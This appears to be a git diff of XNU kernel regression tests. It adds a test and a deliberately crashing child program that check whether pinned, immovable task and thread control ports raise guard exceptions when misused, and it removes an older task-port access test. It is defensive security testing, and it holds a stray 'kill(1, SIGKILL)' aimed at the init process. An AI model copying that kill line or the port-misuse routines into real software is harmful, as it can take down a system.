+ * and processor_set_tasks().
+ * 2. Make sure correct exceptions are raised resulting from moving immovable
+ * task/thread control, read and inspect ports.
+ * 3. Make sure correct exceptions are raised resulting from deallocating pinned
+ * task/thread control ports.
+ * 4. Make sure immovable ports cannot be stashed:
+ * rdar://70585367 (Disallow immovable port stashing with *_set_special_port() and mach_port_register())
+ */
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(TRUE));
+
+static uint64_t test_exception_code[] = {
+       /* Pinning tests. Currently delivered as soft crash */
+       EXC_GUARD, // Soft crash delivered as EXC_CORPSE_NOTIFY
+       EXC_GUARD,
+       EXC_GUARD,
+       EXC_GUARD,
+       EXC_GUARD,
+
+       /* Immovable tests. Currently delivered as hard crash */
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+       (GUARD_TYPE_MACH_PORT << EXC_GUARD_TYPE_SHIFT) | kGUARD_EXC_IMMOVABLE,
+};
+
+kern_return_t
+catch_mach_exception_raise_state(mach_port_t exception_port,
+    exception_type_t exception,
+    const mach_exception_data_t code,
+    mach_msg_type_number_t code_count,
+    int * flavor,
+    const thread_state_t old_state,
+    mach_msg_type_number_t old_state_count,
+    thread_state_t new_state,
+    mach_msg_type_number_t * new_state_count)
+{
+#pragma unused(exception_port, exception, code, code_count, flavor, old_state, old_state_count, new_state, new_state_count)
+       T_FAIL("Unsupported catch_mach_exception_raise_state");
+       return KERN_NOT_SUPPORTED;
+}
+
+kern_return_t
+catch_mach_exception_raise_state_identity(mach_port_t exception_port,
+    mach_port_t thread,
+    mach_port_t task,
+    exception_type_t exception,
+    mach_exception_data_t code,
+    mach_msg_type_number_t code_count,
+    int * flavor,
+    thread_state_t old_state,
+    mach_msg_type_number_t old_state_count,
+    thread_state_t new_state,
+    mach_msg_type_number_t * new_state_count)
+{
+#pragma unused(exception_port, thread, task, exception, code, code_count, flavor, old_state, old_state_count, new_state, new_state_count)
+       T_FAIL("Unsupported catch_mach_exception_raise_state_identity");
+       return KERN_NOT_SUPPORTED;
+}
+
+kern_return_t
+catch_mach_exception_raise(mach_port_t exception_port,
+    mach_port_t thread,
+    mach_port_t task,
+    exception_type_t exception,
+    mach_exception_data_t code,
+    mach_msg_type_number_t code_count)
+{
+#pragma unused(exception_port, code_count)
+       pid_t pid;
+       kern_return_t kr = pid_for_task(task, &pid);
+       T_EXPECT_MACH_SUCCESS(kr, "pid_for_task");
+       T_LOG("Crashing child pid: %d, continuing...\n", pid);
+
+       kr = mach_port_deallocate(mach_task_self(), thread);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
+       kr = mach_port_deallocate(mach_task_self(), task);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
+
+       T_LOG("Caught exception type: %d code: 0x%llx", exception, *((uint64_t*)code));
+       if (exception == EXC_GUARD || exception == EXC_CORPSE_NOTIFY) {
+               exception_taken = exception;
+               exception_code = *((uint64_t *)code);
+       } else {
+               T_FAIL("Unexpected exception");
+       }
+       return KERN_SUCCESS;
+}
+
+static void *
+exception_server_thread(void *arg)
+{
+       kern_return_t kr;
+       mach_port_t exc_port = *(mach_port_t *)arg;
+
+       /* Handle exceptions on exc_port */
+       kr = mach_msg_server_once(mach_exc_server, 4096, exc_port, 0);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_msg_server_once");
+
+       return NULL;
+}
+
+static mach_port_t
+alloc_exception_port(void)
+{
+       kern_return_t kret;
+       mach_port_t exc_port = MACH_PORT_NULL;
+       mach_port_t task = mach_task_self();
+
+       kret = mach_port_allocate(task, MACH_PORT_RIGHT_RECEIVE, &exc_port);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kret, "mach_port_allocate exc_port");
+
+       kret = mach_port_insert_right(task, exc_port, exc_port, MACH_MSG_TYPE_MAKE_SEND);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kret, "mach_port_insert_right exc_port");
+
+       return exc_port;
+}
+
+static void
+test_immovable_port_stashing(void)
+{
+       kern_return_t kr;
+       mach_port_t port;
+
+       kr = task_set_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, mach_task_self());
+       T_EXPECT_EQ(kr, KERN_INVALID_RIGHT, "should disallow task_set_special_port() with immovable port");
+
+       kr = thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, mach_thread_self());
+       T_EXPECT_EQ(kr, KERN_INVALID_RIGHT, "should disallow task_set_special_port() with immovable port");
+
+       mach_port_t stash[1] = {mach_task_self()};
+       kr = mach_ports_register(mach_task_self(), stash, 1);
+       T_EXPECT_EQ(kr, KERN_INVALID_RIGHT, "should disallow mach_ports_register() with immovable port");
+
+       T_QUIET; T_ASSERT_MACH_SUCCESS(mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port), "mach_port_allocate");
+       T_QUIET; T_ASSERT_MACH_SUCCESS(mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND), "mach_port_insert_right");
+
+       stash[0] = port;
+       kr = mach_ports_register(mach_task_self(), stash, 1);
+       T_EXPECT_MACH_SUCCESS(kr, "mach_ports_register() should succeed with movable port");
+}
+
+static void
+test_task_thread_port_values(void)
+{
+       T_LOG("Compare various task/thread control port values\n");
+       kern_return_t kr;
+       mach_port_t port, th_self;
+       thread_array_t threadList;
+       mach_msg_type_number_t threadCount = 0;
+       boolean_t found_self = false;
+       processor_set_name_array_t psets;
+       processor_set_t        pset_priv;
+       task_array_t taskList;
+       mach_msg_type_number_t pcnt = 0, tcnt = 0;
+       mach_port_t host = mach_host_self();
+
+       /* Compare with task/thread_get_special_port() */
+       kr = task_get_special_port(mach_task_self(), TASK_KERNEL_PORT, &port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - TASK_KERNEL_PORT");
+       T_EXPECT_NE(port, mach_task_self(), "TASK_KERNEL_PORT should not match mach_task_self()");
+       mach_port_deallocate(mach_task_self(), port);
+
+       kr = task_for_pid(mach_task_self(), getpid(), &port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_for_pid()");
+       T_EXPECT_EQ(port, mach_task_self(), "task_for_pid(self) should match mach_task_self()");
+       mach_port_deallocate(mach_task_self(), port);
+
+       th_self = mach_thread_self();
+       kr = thread_get_special_port(th_self, THREAD_KERNEL_PORT, &port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port() - THREAD_KERNEL_PORT");
+       T_EXPECT_NE(port, th_self, "THREAD_KERNEL_PORT should not match mach_thread_self()");
+       mach_port_deallocate(mach_task_self(), port);
+
+       /* Make sure task_threads() return immovable thread ports */
+       kr = task_threads(mach_task_self(), &threadList, &threadCount);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_threads()");
+       T_QUIET; T_ASSERT_GE(threadCount, 1, "should have at least 1 thread");
+
+       for (size_t i = 0; i < threadCount; i++) {
+               if (th_self == threadList[i]) { /* th_self is immovable */
+                       found_self = true;
+                       break;
+               }
+       }
+
+       T_EXPECT_TRUE(found_self, "task_threads() should return immovable thread self");
+
+       for (size_t i = 0; i < threadCount; i++) {
+               mach_port_deallocate(mach_task_self(), threadList[i]);
+       }
+
+       if (threadCount > 0) {
+               mach_vm_deallocate(mach_task_self(),
+                   (mach_vm_address_t)threadList,
+                   threadCount * sizeof(mach_port_t));
+       }
+
+       mach_port_deallocate(mach_task_self(), th_self);
+
+       /* Make sure processor_set_tasks() return immovable task self */
+       kr = host_processor_sets(host, &psets, &pcnt);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_sets");
+       T_QUIET; T_ASSERT_GE(pcnt, 1, "should have at least 1 processor set");
+
+       kr = host_processor_set_priv(host, psets[0], &pset_priv);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_set_priv");
+       for (size_t i = 0; i < pcnt; i++) {
+               mach_port_deallocate(mach_task_self(), psets[i]);
+       }
+       mach_port_deallocate(mach_task_self(), host);
+       vm_deallocate(mach_task_self(), (vm_address_t)psets, (vm_size_t)pcnt * sizeof(mach_port_t));
+
+       kr = processor_set_tasks_with_flavor(pset_priv, TASK_FLAVOR_CONTROL, &taskList, &tcnt);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "processor_set_tasks_with_flavor");
+       T_QUIET; T_ASSERT_GE(tcnt, 1, "should have at least 1 task");
+       mach_port_deallocate(mach_task_self(), pset_priv);
+
+       found_self = false;
+       for (size_t i = 0; i < tcnt; i++) {
+               if (taskList[i] == mach_task_self()) {
+                       found_self = true;
+                       break;
+               }
+       }
+
+       T_EXPECT_TRUE(found_self, " processor_set_tasks() should return immovable task self");
+
+       for (size_t i = 0; i < tcnt; i++) {
+               mach_port_deallocate(mach_task_self(), taskList[i]);
+       }
+
+       if (tcnt > 0) {
+               mach_vm_deallocate(mach_task_self(),
+                   (mach_vm_address_t)taskList,
+                   tcnt * sizeof(mach_port_t));
+       }
+}
+
+T_DECL(imm_pinned_control_port, "Test pinned & immovable task and thread control ports",
+    T_META_IGNORECRASHES(".*pinned_rights_child.*"),
+    T_META_CHECK_LEAKS(false))
+{
+       uint32_t task_exc_guard = 0;
+       size_t te_size = sizeof(&task_exc_guard);
+       posix_spawnattr_t       attrs;
+       char *test_prog_name = "./imm_pinned_control_port_crasher";
+       char *child_args[MAX_ARGV];
+       pid_t client_pid = 0;
+       uint32_t opts = 0;
+       size_t size = sizeof(&opts);
+       mach_port_t exc_port;
+       pthread_t s_exc_thread;
+       uint64_t exc_id;
+
+       T_LOG("Check if task_exc_guard exception has been enabled\n");
+       int ret = sysctlbyname("kern.task_exc_guard_default", &task_exc_guard, &te_size, NULL, 0);
+       T_ASSERT_EQ(ret, 0, "sysctlbyname");
+
+       if (!(task_exc_guard & TASK_EXC_GUARD_MP_DELIVER)) {
+               T_SKIP("task_exc_guard exception is not enabled");
+       }
+
+       T_LOG("Check if immovable control port has been enabled\n");
+       ret = sysctlbyname("kern.ipc_control_port_options", &opts, &size, NULL, 0);
+
+       if (!ret && (opts & 0x30) == 0) {
+               T_SKIP("immovable control port isn't enabled");
+       }
+
+       /* first, try out comparing various task/thread ports */
+       test_task_thread_port_values();
+
+       /* try stashing immovable ports: rdar://70585367 */
+       test_immovable_port_stashing();
+
+       /* spawn a child and see if EXC_GUARD are correctly generated */
+       for (int i = 0; i < MAX_TEST_NUM; i++) {
+               /* Create the exception port for the child */
+               exc_port = alloc_exception_port();
+               T_QUIET; T_ASSERT_NE(exc_port, MACH_PORT_NULL, "Create a new exception port");
+
+               /* Create exception serving thread */
+               ret = pthread_create(&s_exc_thread, NULL, exception_server_thread, &exc_port);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create exception_server_thread");
+
+               /* Initialize posix_spawn attributes */
+               posix_spawnattr_init(&attrs);
+
+               int err = posix_spawnattr_setexceptionports_np(&attrs, EXC_MASK_GUARD | EXC_MASK_CORPSE_NOTIFY, exc_port,
+                   (exception_behavior_t) (EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES), 0);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(err, "posix_spawnattr_setflags");
+
+               child_args[0] = test_prog_name;
+               char test_num[10];
+               sprintf(test_num, "%d", i);
+               child_args[1] = test_num;
+               child_args[2] = NULL;
+
+               T_LOG("========== Spawning new child ==========");
+               err = posix_spawn(&client_pid, child_args[0], NULL, &attrs, &child_args[0], environ);
+               T_ASSERT_POSIX_SUCCESS(err, "posix_spawn control_port_options_client = %d test_num = %d", client_pid, i);
+
+               /* try extracting child task port: rdar://71744817
+                * Moved to tests/extract_right_soft_fail.c
+                */
+               // test_extract_immovable_task_port(client_pid);
+
+               int child_status;
+               /* Wait for child and check for exception */
+               if (-1 == waitpid(-1, &child_status, 0)) {
+                       T_FAIL("waitpid: child mia");
+               }
+
+               if (WIFEXITED(child_status) && WEXITSTATUS(child_status)) {
+                       T_FAIL("Child exited with status = %x", child_status);
+                       T_END;
+               }
+
+               sleep(1);
+               kill(1, SIGKILL);
+
+               ret = pthread_join(s_exc_thread, NULL);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_join");
+
+               if (exception_taken == EXC_GUARD) {
+                       exc_id = exception_code >> EXC_CODE_SHIFT;
+               } else {
+                       exc_id = exception_code;
+               }
+
+               T_LOG("Exception code: Received code = 0x%llx Expected code = 0x%llx", exc_id, test_exception_code[i]);
+               T_EXPECT_EQ(exc_id, test_exception_code[i], "Exception code: Received == Expected");
+       }
+}
diff --git a/tests/imm_pinned_control_port_crasher.c b/tests/imm_pinned_control_port_crasher.c
new file mode 100644 (file)
index 0000000..951ef9e
--- /dev/null
@@ -0,0 +1,262 @@
+#include <mach/mach.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <assert.h>
+
+/*
+ * DO NOT run this test file by itself.
+ * This test is meant to be invoked by control_port_options darwintest.
+ *
+ * If hard enforcement for pinned control port is on, pinned_test_main_thread_mod_ref-5 are
+ * expected to generate fatal EXC_GUARD.
+ *
+ * If hard enforcement for immovable control port is on, immovable_test_move_send_task_self-13 are
+ * expected to generate fatal EXC_GUARD.
+ *
+ * The type of exception raised (if any) is checked on control_port_options side.
+ */
+#define MAX_TEST_NUM 13
+
+static int
+attempt_send_immovable_port(mach_port_name_t port, mach_msg_type_name_t disp)
+{
+       mach_port_t server;
+       kern_return_t kr;
+       kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &server);
+       assert(kr == 0);
+
+       kr = mach_port_insert_right(mach_task_self(), server, server, MACH_MSG_TYPE_MAKE_SEND);
+       assert(kr == 0);
+
+       struct {
+               mach_msg_header_t header;
+               mach_msg_body_t body;
+               mach_msg_port_descriptor_t desc;
+       } msg;
+
+       msg.header.msgh_remote_port = server;
+       msg.header.msgh_local_port = MACH_PORT_NULL;
+       msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX;
+       msg.header.msgh_size = sizeof msg;
+
+       msg.body.msgh_descriptor_count = 1;
+
+       msg.desc.name = port;
+       msg.desc.disposition = disp;
+       msg.desc.type = MACH_MSG_PORT_DESCRIPTOR;
+
+       return mach_msg_send(&msg.header);
+}
+
+static void
+pinned_test_main_thread_mod_ref()
+{
+       printf("[Crasher]: Mod refs main thread's self port to 0\n");
+       mach_port_t thread_self = mach_thread_self();
+       kern_return_t kr = mach_port_mod_refs(mach_task_self(), thread_self, MACH_PORT_RIGHT_SEND, -2);
+
+       printf("[Crasher pinned_test_main_thread_mod_ref] mach_port_mod_refs returned %s \n.", mach_error_string(kr));
+}
+
+static void*
+pthread_run()
+{
+       printf("[Crasher]: Deallocate pthread_self\n");
+       mach_port_t th_self = pthread_mach_thread_np(pthread_self());
+       kern_return_t kr = mach_port_deallocate(mach_task_self(), th_self);
+
+       printf("[Crasher pinned_test_pthread_dealloc] mach_port_deallocate returned %s \n.", mach_error_string(kr));
+       return NULL;
+}
+
+static void
+pinned_test_pthread_dealloc()
+{
+       printf("[Crasher]: Create a pthread and deallocate its self port\n");
+       pthread_t thread;
+       int ret = pthread_create(&thread, NULL, pthread_run, NULL);
+       assert(ret == 0);
+       ret = pthread_join(thread, NULL);
+       assert(ret == 0);
+}
+
+static void
+pinned_test_task_self_dealloc()
+{
+       printf("[Crasher]: Deallocate mach_task_self twice\n");
+       mach_port_t task_self = mach_task_self();
+       kern_return_t kr = mach_port_deallocate(task_self, task_self);
+       assert(kr == 0);
+       kr = mach_port_deallocate(task_self, task_self);
+
+       printf("[Crasher pinned_test_task_self_dealloc] mach_port_deallocate returned %s \n.", mach_error_string(kr));
+}
+
+static void
+pinned_test_task_self_mod_ref()
+{
+       printf("[Crasher]: Mod refs mach_task_self() to 0\n");
+       kern_return_t kr = mach_port_mod_refs(mach_task_self(), mach_task_self(), MACH_PORT_RIGHT_SEND, -2);
+
+       printf("[Crasher pinned_test_task_self_mod_ref] mach_port_mod_refs returned %s \n.", mach_error_string(kr));
+}
+
+static void
+pinned_test_task_threads_mod_ref()
+{
+       printf("[Crasher]: task_threads should return pinned thread ports. Mod refs them to 0\n");
+       thread_array_t th_list;
+       mach_msg_type_number_t th_cnt;
+       kern_return_t kr;
+       mach_port_t th_kp = mach_thread_self();
+       mach_port_deallocate(mach_task_self(), th_kp);
+
+       kr = task_threads(mach_task_self(), &th_list, &th_cnt);
+       mach_port_deallocate(mach_task_self(), th_list[0]);
+
+       kr = mach_port_mod_refs(mach_task_self(), th_list[0], MACH_PORT_RIGHT_SEND, -1);
+
+       printf("[Crasher pinned_test_task_threads_mod_ref] mach_port_mod_refs returned %s \n.", mach_error_string(kr));
+}
+
+static void
+immovable_test_move_send_task_self()
+{
+       kern_return_t kr;
+       printf("[Crasher]: Move send mach_task_self_\n");
+       kr = attempt_send_immovable_port(mach_task_self(), MACH_MSG_TYPE_MOVE_SEND);
+
+       printf("[Crasher immovable_test_move_send_task_self] attempt_send_immovable_port returned %s \n.", mach_error_string(kr));
+}
+
+static void
+immovable_test_copy_send_task_self()
+{
+       kern_return_t kr;
+       printf("[Crasher]: Copy send mach_task_self_\n");
+       kr = attempt_send_immovable_port(mach_task_self(), MACH_MSG_TYPE_COPY_SEND);
+
+       printf("[Crasher immovable_test_copy_send_task_self] attempt_send_immovable_port returned %s \n.", mach_error_string(kr));
+}
+
+static void
+immovable_test_move_send_thread_self()
+{
+       kern_return_t kr;
+       printf("[Crasher]: Move send main thread's self port\n");
+       kr = attempt_send_immovable_port(mach_thread_self(), MACH_MSG_TYPE_MOVE_SEND);
+
+       printf("[Crasher immovable_test_move_send_thread_self] attempt_send_immovable_port returned %s \n.", mach_error_string(kr));
+}
+
+static void
+immovable_test_copy_send_thread_self()
+{
+       kern_return_t kr;
+       mach_port_t port;
+       printf("[Crasher]: Copy send main thread's self port\n");
+       port = mach_thread_self();
+       kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_COPY_SEND);
+       printf("[Crasher immovable_test_copy_send_thread_self] attempt_send_immovable_port returned %s \n.", mach_error_string(kr));
+
+       mach_port_deallocate(mach_task_self(), port);
+}
+
+static void
+immovable_test_copy_send_task_read()
+{
+       kern_return_t kr;
+       mach_port_t port;
+       printf("[Crasher]: Copy send task read port\n");
+       kr = task_get_special_port(mach_task_self(), TASK_READ_PORT, &port);
+       assert(kr == 0);
+       kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_COPY_SEND);
+       printf("[Crasher immovable_test_copy_send_task_read] attempt_send_immovable_port returned %s \n.", mach_error_string(kr));
+
+       mach_port_deallocate(mach_task_self(), port);
+}
+
+static void
+immovable_test_copy_send_task_inspect()
+{
+       kern_return_t kr;
+       mach_port_t port;
+       printf("[Crasher]: Move send task inspect port\n");
+       kr = task_get_special_port(mach_task_self(), TASK_INSPECT_PORT, &port);
+       assert(kr == 0);
+       kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_MOVE_SEND);
+       printf("[Crasher immovable_test_copy_send_task_inspect] attempt_send_immovable_port returned %s \n.", mach_error_string(kr));
+}
+
+static void
+immovable_test_move_send_thread_inspect()
+{
+       kern_return_t kr;
+       mach_port_t port;
+       mach_port_t th_port = mach_thread_self();
+
+       printf("[Crasher]: Move send thread inspect port\n");
+       kr = thread_get_special_port(th_port, THREAD_INSPECT_PORT, &port);
+       assert(kr == 0);
+       kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_MOVE_SEND);
+       printf("[Crasher immovable_test_move_send_thread_inspect] attempt_send_immovable_port returned %s \n.", mach_error_string(kr));
+
+       mach_port_deallocate(mach_task_self(), th_port);
+}
+
+static void
+immovable_test_copy_send_thread_read()
+{
+       kern_return_t kr;
+       mach_port_t port;
+       mach_port_t th_port = mach_thread_self();
+
+       printf("[Crasher]: Copy send thread read port\n");
+       kr = thread_get_special_port(th_port, THREAD_READ_PORT, &port);
+       assert(kr == 0);
+       kr = attempt_send_immovable_port(port, MACH_MSG_TYPE_COPY_SEND);
+       printf("[Crasher immovable_test_copy_send_thread_read] attempt_send_immovable_port returned %s \n.", mach_error_string(kr));
+
+       mach_port_deallocate(mach_task_self(), port);
+       mach_port_deallocate(mach_task_self(), th_port);
+}
+
+int
+main(int argc, char *argv[])
+{
+       void (*tests[MAX_TEST_NUM])(void) = {
+               pinned_test_main_thread_mod_ref,
+               pinned_test_pthread_dealloc,
+               pinned_test_task_self_dealloc,
+               pinned_test_task_self_mod_ref,
+               pinned_test_task_threads_mod_ref,
+
+               immovable_test_move_send_task_self,
+               immovable_test_copy_send_task_self,
+               immovable_test_move_send_thread_self,
+               immovable_test_copy_send_thread_self,
+               immovable_test_copy_send_task_read,
+               immovable_test_copy_send_task_inspect,
+               immovable_test_move_send_thread_inspect,
+               immovable_test_copy_send_thread_read,
+       };
+       printf("[Crasher]: My Pid: %d\n", getpid());
+
+       if (argc < 2) {
+               printf("[Crasher]: Specify a test to run.");
+               exit(-1);
+       }
+
+       int test_num = atoi(argv[1]);
+
+       if (test_num >= 0 && test_num < MAX_TEST_NUM) {
+               (*tests[test_num])();
+       } else {
+               printf("[Crasher]: Invalid test num. Exiting...\n");
+               exit(-1);
+       }
+
+       exit(0);
+}
diff --git a/tests/inspect_port.c b/tests/inspect_port.c
deleted file mode 100644 (file)
index b128b5b..0000000
+++ /dev/null
@@ -1,581 +0,0 @@
-#include <stdio.h>
-#include <stdlib.h>
-#include <unistd.h>
-#include <darwintest.h>
-#include <pthread.h>
-#include <signal.h>
-#include <libproc.h>
-#include <mach/mach.h>
-#include <mach/mach_vm.h>
-#include <mach/mach_error.h>
-#include <System/sys/codesign.h>
-#include <sys/proc.h>
-
-int task_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t);
-int task_read_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t);
-int task_inspect_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t);
-int task_name_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t);
-static int test_conversion_eval(pid_t current, pid_t victim, int translation);
-
-static int g_tfpFail  = 0;
-static int g_trfpFail = 0;
-static int g_tifpFail = 0;
-static int g_tnfpFail = 0;
-
-static pthread_mutex_t g_lock;
-
-#define NAME    0
-#define INSPECT 1
-#define READ    2
-#define FULL    3
-#define POLY    4
-
-/*
- *  3. child still spawn as platform binary
- */
-
-/* Mimic the behavior of task_conversion_eval in kernel.
- */
-static int
-test_conversion_eval(pid_t current, pid_t victim, int translation)
-{
-       uint32_t my_csflags = 0;
-       uint32_t victim_csflags = 0;
-       csops(victim, CS_OPS_STATUS, &victim_csflags, sizeof(victim_csflags));
-       csops(current, CS_OPS_STATUS, &my_csflags, sizeof(my_csflags));
-
-       switch (translation) {
-       case FULL:
-       case READ:
-               if (victim == 0) {
-                       return false;
-               }
-               if (!(my_csflags & CS_PLATFORM_BINARY) && (victim_csflags & CS_PLATFORM_BINARY)) {
-                       return false;
-               }
-               break;
-       default:
-               break;
-       }
-
-       return true;
-}
-
-static void
-check_result(kern_return_t kr, int port_type, int translation, int low, char *test_str, pid_t victim)
-{
-       char error[100];
-
-       if (translation == POLY) {
-               if (port_type == FULL) {
-                       translation = INSPECT;
-               } else {
-                       translation = port_type;
-               }
-       }
-
-       if (port_type < low) {
-               goto fail;
-       } else if (port_type < translation) {
-               goto fail;
-       } else if (!test_conversion_eval(getpid(), victim, translation)) {
-               goto fail;
-       } else {
-               goto success;
-       }
-
-fail:
-       snprintf(error, sizeof(error), "%s should fail with %d on %d.\n", test_str, port_type, victim);
-       T_QUIET; T_EXPECT_NE(kr, 0, "check_result: %s", error);
-       return;
-success:
-       snprintf(error, sizeof(error), "%s should succeed with %d on %d.\n", test_str, port_type, victim);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "check_result: %s", error);
-       return;
-}
-
-static void
-test_thread_port(mach_port_name_t thread, int type, pid_t victim)
-{
-       kern_return_t kr;
-       mach_port_t name = MACH_PORT_NULL;
-       thread_info_data_t th_info;
-       mach_msg_type_number_t th_info_cnt = THREAD_INFO_MAX;
-
-       kr = thread_info(thread, THREAD_BASIC_INFO, (thread_info_t)th_info, &th_info_cnt);
-       check_result(kr, type, INSPECT, INSPECT, "thread_info", victim);
-
-       kr = thread_get_special_port(thread, THREAD_KERNEL_PORT, &name);
-       check_result(kr, type, POLY, FULL, "thread_get_special_port: THREAD_KERNEL_PORT", victim);
-       kr = mach_port_deallocate(mach_task_self(), name);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       kr = thread_get_special_port(thread, THREAD_READ_PORT, &name);
-       check_result(kr, type, POLY, READ, "thread_get_special_port: THREAD_READ_PORT", victim);
-       kr = mach_port_deallocate(mach_task_self(), name);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-
-       kr = thread_get_special_port(thread, THREAD_INSPECT_PORT, &name);
-       check_result(kr, type, POLY, INSPECT, "thread_get_special_port: THREAD_INSPECT_PORT", victim);
-       kr = mach_port_deallocate(mach_task_self(), name);
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-}
-
-static void
-test_task_port(mach_port_name_t port, int type)
-{
-       kern_return_t kr;
-       volatile int data = 0x4141;
-       volatile int new_value = 0x4242;
-       pid_t victim;
-       if (port == MACH_PORT_NULL) {
-               return;
-       }
-       kr = pid_for_task(port, &victim);
-       if (victim == -1) {
-               T_LOG("pid_for_task: port = 0x%x, type = %u is not valid anymore", port, type);
-               return;
-       }
-       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "pid_for_task, port = 0x%x, type = %u, pid = %u", port, type, victim);
-
-       /************* TASK_INFO ************/
-       struct task_basic_info info = {};
-       mach_msg_type_number_t cnt = sizeof(info);
-       kr = task_info(port, TASK_BASIC_INFO, (task_info_t)&info, &cnt);
-       check_result(kr, type, NAME, NAME, "task_info", victim);
-
-       /************ MACH_VM_* ************/
-
-       if (victim == getpid()) {
-               kr = mach_vm_write(port,
-                   (mach_vm_address_t)&data,
-                   (vm_offset_t)&new_value,
-                   (mach_msg_type_number_t)sizeof(int));
-               check_result(kr, type, FULL, FULL, "mach_vm_write", victim);
-
-               vm_offset_t read_value = 0;
-               mach_msg_type_number_t read_cnt = 0;
-               kr = mach_vm_read(port,
-                   (mach_vm_address_t)&data,
-                   (mach_msg_type_number_t)sizeof(int),
-                   &read_value,
-                   &read_cnt);
-               check_result(kr, type, READ, READ, "mach_vm_read", victim);
-       }
-
-       /************ TASK_GET_SPECIAL_PORT ************/
-
-       mach_port_t name = MACH_PORT_NULL;
-       kr = task_get_special_port(port, TASK_KERNEL_PORT, &name);
-       check_result(kr, type, POLY, FULL, "task_get_special_port: TASK_KERNEL_PORT", victim);
-
-       name = MACH_PORT_NULL;
-       kr = task_get_special_port(port, TASK_READ_PORT, &name);
-       check_result(kr, type, POLY, READ, "task_get_special_port: TASK_READ_PORT", victim);
-       if (kr == KERN_SUCCESS) {
-               kr = mach_port_deallocate(mach_task_self(), name);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       name = MACH_PORT_NULL;
-       kr = task_get_special_port(port, TASK_INSPECT_PORT, &name);
-       check_result(kr, type, POLY, INSPECT, "task_get_special_port: TASK_INSPECT_PORT", victim);
-       if (kr == KERN_SUCCESS) {
-               kr = mach_port_deallocate(mach_task_self(), name);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       name = MACH_PORT_NULL;
-       kr = task_get_special_port(port, TASK_NAME_PORT, &name);
-       check_result(kr, type, POLY, INSPECT, "task_get_special_port: TASK_NAME_PORT", victim);
-       if (kr == KERN_SUCCESS) {
-               kr = mach_port_deallocate(mach_task_self(), name);
-               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_port_deallocate");
-       }
-
-       name = MACH_PORT_NULL;
-       kr = task_get_special_port(port, TASK_HOST_PORT, &name);
-       check_result(kr, type, POLY, FULL, "task_get_special_port: TASK_HOST_PORT", victim);
-       if (kr == KERN_SUCCESS) {
-               if (victim == getpid()) {
-                       mach_port_t host = mach_host_self();
-                       T_QUIET; T_EXPECT_EQ(host, name, "mach_host_self == task_get_special_port(.. TASK_HOST_PORT)");
-               }
-       }
-
-       name = MACH_PORT_NULL;
-       kr = task_get_special_port(port, TASK_BOOTSTRAP_PORT, &name);
-       check_result(kr, type, POLY, FULL, "task_get_special_port: TASK_BOOTSTRAP_PORT", victim);
-
-       /************ TEST IPC_SPACE_READ AND IPC_SPACE_INSPECT ************/
-       if (victim == getpid()) {
-               mach_port_status_t status;
-               mach_msg_type_number_t statusCnt = MACH_PORT_LIMITS_INFO_COUNT;
